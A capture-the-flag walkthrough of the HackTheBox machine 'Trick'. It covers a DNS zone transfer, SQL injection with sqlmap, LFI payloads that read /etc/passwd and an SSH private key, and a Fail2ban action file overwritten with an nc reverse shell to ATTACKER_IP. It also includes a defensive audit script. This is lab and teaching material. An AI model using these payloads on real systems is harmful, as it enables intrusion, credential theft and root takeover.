Trick (HTB – Easy)

Trick is a DNS-focused machine: a permitted zone transfer reveals hidden subdomains. One subdomain hosts a SQL-injectable login form, another a file inclusion vulnerability that leaks a user's SSH private key. Privilege escalation abuses a Fail2ban action script that the user can overwrite, together with a sudo rule that lets him restart the service, to obtain a root reverse shell.

Overview

Target: trick.htb
Initial vector: DNS zone transfer → SQL injection → LFI → SSH key
Privilege escalation: Fail2ban action.d overwrite → root shell

Enumeration

Nmap:

22/tcp ssh
25/tcp smtp
53/tcp dns (BIND)
80/tcp http (nginx)

Add trick.htb to /etc/hosts. Nothing interesting on port 80, so enumerate DNS.

DNS Zone Transfer

$ dig axfr trick.htb @trick.htb

The zone transfer succeeds and reveals a new subdomain:

preprod-payroll.trick.htb

Add it to /etc/hosts.

Foothold – SQL Injection on preprod-payroll

The login form is vulnerable to SQL injection. Intercept the request (browser devtools or Burp) and feed it to sqlmap:

$ sqlmap -r request.txt --dbs
-> payroll_db

Dump the users table:

$ sqlmap -r request.txt -D payroll_db -T users --dump

Credentials allow login, but the panel contains nothing useful. Time to enumerate more subdomains.

Subdomain Discovery

Because preprod-payroll exists, other "preprod-" names are likely. Build a wordlist and fuzz the Host header:

$ wfuzz -H "Host: FUZZ.trick.htb" -w subdomains-top1million-5000.txt http://trick.htb
-> preprod-marketing.trick.htb

Add it to /etc/hosts.

LFI – Extracting michael’s SSH Key

The new subdomain contains a page parameter vulnerable to directory traversal:

?page=../../../../../../etc/passwd

This reveals user michael. Extract his SSH key:

?page=../../../../../../home/michael/.ssh/id_rsa

Copy the key, save it locally, and fix permissions:

$ chmod 600 id_rsa
$ ssh -i id_rsa michael@trick.htb

User shell obtained.

Privilege Escalation – Fail2ban Misconfiguration

Check sudo permissions:

$ sudo -l
-> (root) NOPASSWD: /etc/init.d/fail2ban restart

Michael belongs to the security group, which has write access to Fail2ban action files:

/etc/fail2ban/action.d/

Copy an action file to your home directory:

$ cp /etc/fail2ban/action.d/iptables-multiport.conf ~/

Edit the [actionban] section to include a reverse shell:

actionban = /usr/bin/nc ATTACKER_IP 4444 -e /bin/bash

Overwrite the original:

$ mv iptables-multiport.conf /etc/fail2ban/action.d/

Restart Fail2ban:

$ sudo /etc/init.d/fail2ban restart

Trigger the ban by intentionally failing SSH logins:

$ ssh fakeuser@trick.htb

Listener on the attacking machine:

$ nc -nlvp 4444

A root shell is received.
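A defensive counterpart to the escalation above, added here and not part of the original writeup: a POSIX shell audit that flags the two conditions the chain relies on, an action.d directory or .conf file writable by a non-root group or by everyone, and an actionban line that no longer runs iptables. The script name, the default allowlist pattern and the directory argument are assumptions; on the box the directory is /etc/fail2ban/action.d.

```shell
#!/bin/sh
# Added audit script (not from the original writeup): checks a Fail2ban
# action.d tree for the two conditions the escalation above depends on.
# ACTION_DIR is an assumption; on the box it is /etc/fail2ban/action.d.

# audit_action_dir DIR
# Prints DIR itself, or any regular file below it, whose group- or
# world-write bit is set. Write access to the directory alone is enough
# to mv a replacement .conf into place, so the directory is checked too.
# Returns 0 when nothing is writable, 1 otherwise.
audit_action_dir() {
    dir=$1
    # -prune keeps the first find on the directory entry itself;
    # -perm -020 / -002 test the permission bits, not the caller's access,
    # so the result is the same whether the audit runs as root or not.
    hits=$(
        find "$dir" -prune \( -perm -020 -o -perm -002 \) -print
        find "$dir" -type f \( -perm -020 -o -perm -002 \) -print
    )
    [ -z "$hits" ] && return 0
    printf '%s\n' "$hits"
    return 1
}

# flag_actionban FILE [ALLOWED_RE]
# Prints every "actionban =" line in FILE whose command does not match
# ALLOWED_RE (default: an iptables/ipset call, which is what the stock
# iptables-* actions contain). Returns 1 if any such line exists.
flag_actionban() {
    allowed=${2:-'iptables|ipset'}
    bad=$(grep -E '^[[:space:]]*actionban[[:space:]]*=' "$1" \
        | grep -Ev "$allowed")
    [ -z "$bad" ] && return 0
    printf '%s: %s\n' "$1" "$bad"
    return 1
}

# Usage: sh audit_f2b.sh [ACTION_DIR]   (with no argument only the
# functions are defined, so the file can be sourced or tested)
if [ $# -gt 0 ]; then
    status=0
    audit_action_dir "$1" || status=1
    for f in "$1"/*.conf; do
        [ -f "$f" ] && { flag_actionban "$f" || status=1; }
    done
    exit "$status"
fi
```

Run it as a cron or CI check after any Fail2ban change; a non-zero exit means the service would execute an unprivileged user's edits as root on the next ban.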

Conclusion

Trick is a well-designed chain: DNS zone transfer → SQL injection → subdomain discovery → LFI → SSH key → Fail2ban misconfiguration → root. It highlights the importance of DNS enumeration and the danger of automation that runs as root from files an unprivileged user can edit.